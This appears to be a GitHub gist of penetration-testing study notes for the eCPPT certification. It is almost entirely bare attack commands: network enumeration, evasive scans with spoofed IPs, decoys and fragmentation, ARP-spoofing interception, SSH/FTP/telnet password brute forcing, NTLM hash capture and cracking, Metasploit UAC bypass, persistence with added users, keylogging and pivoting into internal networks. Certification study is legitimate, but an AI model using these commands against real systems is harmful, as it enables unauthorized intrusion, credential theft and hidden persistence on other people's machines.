Created
September 6, 2018 19:39
-
-
Save JPMonglis/4b4b842f4844fab2aa772166fd91e606 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
eCPPT NETWORK SECURITY | |
*DNS Enumeration | |
nslookup example.com | |
nslookup -query=mx domain | |
nslookup -query=ns domain | |
nslookup -query=any domain | |
interactime mode { | |
set q=ns domain | |
set q=mx domain | |
set q=cname domain | |
} | |
dig domain | |
dig domain A | |
dig domain NS | |
dig +nocmd domain MX +noall +answer | |
dig +nocmd domain MX +noall +answer | |
dig +nocmd domain AXFR +noall +answer @vulnDNS | |
fierce -dns domain | |
fierce -dns domain -dnsserver vuln.DNS | |
dnsenum domain | |
dnsenum domain --dnsserver vuln.DNS | |
dnsenum domain -f host.list | |
dnsmap domain | |
dnsrecon -d domain | |
*NETBIOS | |
windows commands | |
nbtstat -A $IP | |
net view $IP | |
net use /? | |
net use \\resource\path | |
** net bios auditing tool ** | |
nat.exe -u userlist -p passwordlist $IP | |
winfingerprint GUI tool | |
NULLSESSION | |
net use \\source\ipc$ "" /user:" | |
SID2USER (replace - with " " ) | |
sid2user.exe \\source $SID | |
sid2user.exe \\source $SID 500 (admin) | |
sid2user.exe \\source $SID 501 (guest) | |
sid2user.exe \\source $SID 1000 (account created by user) | |
dumpsec GUI tool | |
linux commands | |
*polenum | |
*ldapscripts | |
enum4linux -a -v $IP | |
smbclient -L $IP | |
smbclient \\\\$IP\\folderToAccess | |
*SNMP Enumeration | |
snmpwalk -h | |
snmpwalk -v -2c -c public $IP | |
snmpwalk -v -2c -c public $IP hrSWInstalledName | |
snmpwalk -v -2c -c public $IP hrMemorySize | |
snmpwalk -v -2c -c public $IP sysContact | |
snmpset -v -2c -c public $IP sysContant.0 s value | |
nmap -sU -p 161 --script snmp-win32-service $IP | |
nmap -SU -p 161 --script snmp-brute $IP | |
nmap -SU -p 161 --script snmp-win32-users $IP | |
SCANNING | |
*Idle Hping & nmap command | |
hping3 -S -r $IP -p 135 # syn scan | |
if the target response with id +1 , that makes him a good zombie, in general status id must be incemented | |
hping3 -a $ZIP -S $VIP -p 23 #spoof IP | |
zip = zombie , vip = victim...if the target response id +2 the 23 is open | |
nmap --script ipdseq $IP -p 135 | |
checks if the id status is incresed | |
nmap -O -v $IP -p 135 | |
nmap -sI $zip:135 $vip -p 23 --packet-trace | |
zombie idle scan (-sI) | |
hping3 -S -r $vip -p 135 + | |
nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping | |
if the target response with incemented id then the port is open | |
*NMAP scan and NSE scripting | |
nmap --script-help "smb" and discovery | |
how to search for nse scripts | |
nmap --script auth $IP | |
runs all auth nse scripts | |
nmap --script default $IP | |
nmap -f $vip -n -p80 --disable-arp-ping -Pn | |
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100 | |
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48 | |
every fragment is sized of 8bytes | |
nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping | |
(every fragment is sized of 16bytes) | |
*Using Decoys (popular idle scans) | |
nmap -p 80 -D $dec1,ME,dec2 $vip | |
nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping | |
hping3 --rand-source -S -p 80 $vip -c 3 | |
hping3 -a $spoofIP -S -p 80 $vip | |
nmap --source-port 53 $vip -sS | |
dns is mostly accepted in firewalls | |
hping3 -S -s 53 --scan known $vip | |
nmap -sS --data-lenght 10 -p 21 $vip | |
hping3 -S -p 21 --data 24 $vip | |
nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n | |
nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n | |
nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n | |
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts | |
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2 | |
hping3 -1 --rand-dest 192.168.1.x -I eth0 | |
hping3 --scan 80,443,21,22 $vip -i u10 | |
Man In The Middle ATTACKS | |
*SNIFFING TRAFFIC | |
tcpdump --help | |
tcpdump -D // list interfaces | |
tcpdump -i eth0 | |
tcpdump -i eth0 -v | |
tcpdump -i eth0 -n //disable dns resolution | |
tcpdump -i eth0 -q //quite option | |
tcpdump -i eth0 host $IP //sniff spesific host or IP | |
tcpdump -i eth0 src $sourceaddr dst $destinaddr | |
tcpdump -i eth0 -F filter.file //file that conainer [port No] | |
tcpdump -i eth0 -c 150 //packets we want to capture | |
tcpdump -i eth0 -w output_file.txt //save output | |
tcpdump -i eth0 -r output_file.txt //read output | |
tcpdump -i eth0 | grep $IP | |
*MITM | |
Promiscuise mode allow network interface card to accept and process all packets receive | |
Switch forward traffic only to the asked destination | |
ettercap | |
bettercap | |
mitmf | |
sslstrip | |
//enable ip forwarded | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
//arp spoofing [2 way] [ | |
arpsoof -i eth0 -t $targetIP $impersonateIP | |
arpsoof -i eth0 -t $impersonateIP $targetIP | |
] | |
dsniff -i eth0 //grabs basic auth credentials | |
bettercap -h | |
bettercap -I eth0 -X -G $target1 -T $target2ip //sniffing mode | |
EXPLOITATION | |
*Auth Bruteforce | |
ncrack -vv -U userlist -P passlist 192.168.1.1 -p @telnet | |
medusa -h 192.168.1.1 -M ssh -U userlist -P passlist | |
hydra -L userlist -P passlist ssh://192.168.1.1 | |
hydra -L userlist -P passlist ssh://192.168.1.1 -T 50 | |
patator ftp_login -help | |
patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Login incorrect" | |
patator ssh_login host=192.168.1.1 user="test" password="test" | |
patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Filter To Use" | |
patator telnet_login inputs="FILE0\nFILE1\n" host= 192.168.1.1 0=userlist 1=passlist -x ingonre:msg="Filter To Use" | |
*LM_NTLM crack | |
use auxilirary/server/capture/smb | |
set JOHNPWFILE hashes | |
rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti // we need wanbow table file , 8 bytes of LM hash (16chars) -t =>(thread) | |
netntlm --file /file/challenge_response --seed passdiscovered // recovers (if cracked) the password | |
netntlm --file /file/challenge_response --seed fullpass // case sensitive | |
POST EXPLOITATION | |
*Privileges Escalation on Windows | |
> sysinfo | |
> getprivs // list session priveleges | |
> run post/windows/gather/win_privs // list all machine privileges and UAC status | |
use epxloit/windows/local/bypassuac_injection // try to bypass the UAC | |
- exploit suggester | |
//external tools | |
UACme | |
*Privileges Escalation on Linux | |
sysinfo | |
- exploit suggester | |
> execute -f /bin/sh -i -c // create a new channel and interacts with it | |
*Maintaine Access & persistance | |
(inside meterpreter) | |
- migration to another service | |
- hashdump OR post /windows/gather/smart_hashdump | |
- psexec | |
Adding new user to remote system | |
- run getgui -e -u user -p pass //adding new user via RDP and enabled (connect via [ xfreerdp /v:$IP /u:$user /p:$pass | |
- exploit/windows/local/persistence | |
*Pillaling | |
shell > systeminfo | |
mptr > post/windows/gather/* | |
> search -f *.kdb -r -d //searching for specific info | |
> post/windows/capture/* //keyloger | |
shell > ipconfig /all | |
# > route OR+AND arp | |
# > netstat -ano | |
# > wmic ? | |
# > wmic service /? | |
# > wmic service get [caption,started] | |
# > wmic service where started=true get caption | |
*Mapping Internal network | |
shell > ipconfig /all | |
mtrp > arp & route | |
shell > ipconfig /displaydns | |
# > netstat -ano | |
# > netstat -b | |
msf > post/multi/gather/ping_sweep | |
mtpr > run arp_scan -r $IP/* | |
msf > post/windows/manage/autoroute // adding route so can scan internal network | |
# > auxiliary/server/socks4a // configure socks proxy ( edite proxyxhains ) | |
mtpr > portfwd add -l 8080 -p 80 -r $Remote IP // l = local port , p = remote port , r = remote host |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment